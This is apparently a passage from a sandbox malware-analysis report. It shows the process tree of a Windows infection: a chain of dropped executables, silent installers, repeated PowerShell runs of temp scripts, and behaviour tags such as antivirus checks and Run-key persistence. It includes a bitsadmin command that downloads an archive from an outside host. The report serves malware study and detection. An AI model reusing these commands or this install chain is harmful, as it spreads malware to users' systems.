- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nj0whtl2.om0\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\nj0whtl2.om0\installer.exeC:\Users\Admin\AppData\Local\Temp\nj0whtl2.om0\installer.exe /qn CAMPAIGN="654"14⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nj0whtl2.om0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nj0whtl2.om0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\auuypysb.lv5\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\auuypysb.lv5\any.exeC:\Users\Admin\AppData\Local\Temp\auuypysb.lv5\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\auuypysb.lv5\any.exe"C:\Users\Admin\AppData\Local\Temp\auuypysb.lv5\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zy1lucqe.an0\customer51.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\zy1lucqe.an0\customer51.exeC:\Users\Admin\AppData\Local\Temp\zy1lucqe.an0\customer51.exe14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtmgf1w0.5ug\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\xtmgf1w0.5ug\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xtmgf1w0.5ug\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9100 -s 20415⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ugfhhi2v.yym\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ugfhhi2v.yym\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ugfhhi2v.yym\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr917B.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wen1kkqk.ho1\installer.exe /qn CAMPAIGN=654 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\wen1kkqk.ho1\installer.exeC:\Users\Admin\AppData\Local\Temp\wen1kkqk.ho1\installer.exe /qn CAMPAIGN=65414⤵
-
C:\Users\Admin\Pictures\Adobe Films\SyxkHG6xCsgdmnepicLocJDL.exe"C:\Users\Admin\Pictures\Adobe Films\SyxkHG6xCsgdmnepicLocJDL.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KLGLN.tmp\SyxkHG6xCsgdmnepicLocJDL.tmp"C:\Users\Admin\AppData\Local\Temp\is-KLGLN.tmp\SyxkHG6xCsgdmnepicLocJDL.tmp" /SL5="$70132,506127,422400,C:\Users\Admin\Pictures\Adobe Films\SyxkHG6xCsgdmnepicLocJDL.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-I2K5D.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-I2K5D.tmp\ShareFolder.exe" /S /UID=270911⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\05-949bf-f11-cf78d-be89f7fee6aa0\Laebaezhaexula.exe"C:\Users\Admin\AppData\Local\Temp\05-949bf-f11-cf78d-be89f7fee6aa0\Laebaezhaexula.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n5tb5lg0.ory\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\n5tb5lg0.ory\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\n5tb5lg0.ory\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10716 -s 24815⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bztu2043.m00\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\bztu2043.m00\installer.exeC:\Users\Admin\AppData\Local\Temp\bztu2043.m00\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0cshp5l.532\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\f0cshp5l.532\any.exeC:\Users\Admin\AppData\Local\Temp\f0cshp5l.532\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\f0cshp5l.532\any.exe"C:\Users\Admin\AppData\Local\Temp\f0cshp5l.532\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vpu4kzpn.heq\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\vpu4kzpn.heq\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vpu4kzpn.heq\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12520 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bxho4qwh.ogx\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\bxho4qwh.ogx\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\bxho4qwh.ogx\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse307A.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\DDGFmreAmRulc0y2ma2a3Jpw.exe"C:\Users\Admin\Pictures\Adobe Films\DDGFmreAmRulc0y2ma2a3Jpw.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ff87888dec0,0x7ff87888ded0,0x7ff87888dee012⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff607aa9e70,0x7ff607aa9e80,0x7ff607aa9e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,16481080982875248700,16684224138872227626,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw17904_27224117" --mojo-platform-channel-handle=1752 /prefetch:812⤵
-
C:\Users\Admin\Pictures\Adobe Films\PNMKLAPwr5ErzUUHRjsBz37e.exe"C:\Users\Admin\Pictures\Adobe Films\PNMKLAPwr5ErzUUHRjsBz37e.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\427k7GX7zKXCwdsG204Llusg.exe"C:\Users\Admin\Pictures\Adobe Films\427k7GX7zKXCwdsG204Llusg.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\4ujWsOfWNHyu9F9f_UNQytd8.exe"C:\Users\Admin\Pictures\Adobe Films\4ujWsOfWNHyu9F9f_UNQytd8.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\dkXwYYim4MBaHXEPgI2496RO.exe"C:\Users\Admin\Pictures\Adobe Films\dkXwYYim4MBaHXEPgI2496RO.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\dkXwYYim4MBaHXEPgI2496RO.exe"C:\Users\Admin\Pictures\Adobe Films\dkXwYYim4MBaHXEPgI2496RO.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\dkXwYYim4MBaHXEPgI2496RO.exe"C:\Users\Admin\Pictures\Adobe Films\dkXwYYim4MBaHXEPgI2496RO.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\rzFPMen3odIYaTyH172kj3IK.exe"C:\Users\Admin\Pictures\Adobe Films\rzFPMen3odIYaTyH172kj3IK.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\DPf8n8re0wSS4BsJopFZX_fw.exe"C:\Users\Admin\Pictures\Adobe Films\DPf8n8re0wSS4BsJopFZX_fw.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\mUWMZpz81mXRuU24Z6aKAGGB.exe"C:\Users\Admin\Pictures\Adobe Films\mUWMZpz81mXRuU24Z6aKAGGB.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\n4vMR6ebgJAxlDmOyMAhNupH.exe"C:\Users\Admin\Pictures\Adobe Films\n4vMR6ebgJAxlDmOyMAhNupH.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\TMnzDfTlwNkK30H06E1jeF_8.exe"C:\Users\Admin\Pictures\Adobe Films\TMnzDfTlwNkK30H06E1jeF_8.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\TMnzDfTlwNkK30H06E1jeF_8.exe"C:\Users\Admin\Pictures\Adobe Films\TMnzDfTlwNkK30H06E1jeF_8.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\xHi60jdyEGDpMH1FO5p87jsK.exe"C:\Users\Admin\Pictures\Adobe Films\xHi60jdyEGDpMH1FO5p87jsK.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\6_pV7UATkHEXMa9PhaA18ifX.exe"C:\Users\Admin\Pictures\Adobe Films\6_pV7UATkHEXMa9PhaA18ifX.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S55JH.tmp\6_pV7UATkHEXMa9PhaA18ifX.tmp"C:\Users\Admin\AppData\Local\Temp\is-S55JH.tmp\6_pV7UATkHEXMa9PhaA18ifX.tmp" /SL5="$602D0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\6_pV7UATkHEXMa9PhaA18ifX.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-TV64E.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-TV64E.tmp\ShareFolder.exe" /S /UID=27109⤵
-
C:\Program Files\Windows Photo Viewer\NQFREQHEVC\foldershare.exe"C:\Program Files\Windows Photo Viewer\NQFREQHEVC\foldershare.exe" /VERYSILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\d3-cb998-127-4d8b8-3029df0d347bd\SHixalyjasa.exe"C:\Users\Admin\AppData\Local\Temp\d3-cb998-127-4d8b8-3029df0d347bd\SHixalyjasa.exe"10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86f3746f8,0x7ff86f374708,0x7ff86f37471812⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:212⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=184 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:212⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1524 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,14649418936905331684,11168027258750547554,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86f3746f8,0x7ff86f374708,0x7ff86f37471812⤵
-
C:\Users\Admin\AppData\Local\Temp\80-f0535-740-03da3-a4acaf96105e6\Hirojalybo.exe"C:\Users\Admin\AppData\Local\Temp\80-f0535-740-03da3-a4acaf96105e6\Hirojalybo.exe"10⤵
-
C:\Users\Admin\Pictures\Adobe Films\UBVoJ0OhpmkG2JN4CB1JiX_q.exe"C:\Users\Admin\Pictures\Adobe Films\UBVoJ0OhpmkG2JN4CB1JiX_q.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01d42d6cf82db.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01d42d6cf82db.exeSat01d42d6cf82db.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01d42d6cf82db.exeC:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01d42d6cf82db.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01d42d6cf82db.exeC:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01d42d6cf82db.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01c0e0d4fbb2ea73.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01c0e0d4fbb2ea73.exeSat01c0e0d4fbb2ea73.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 2487⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01f932a994dbc6.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01f932a994dbc6.exeSat01f932a994dbc6.exe6⤵
- Executes dropped EXE
-
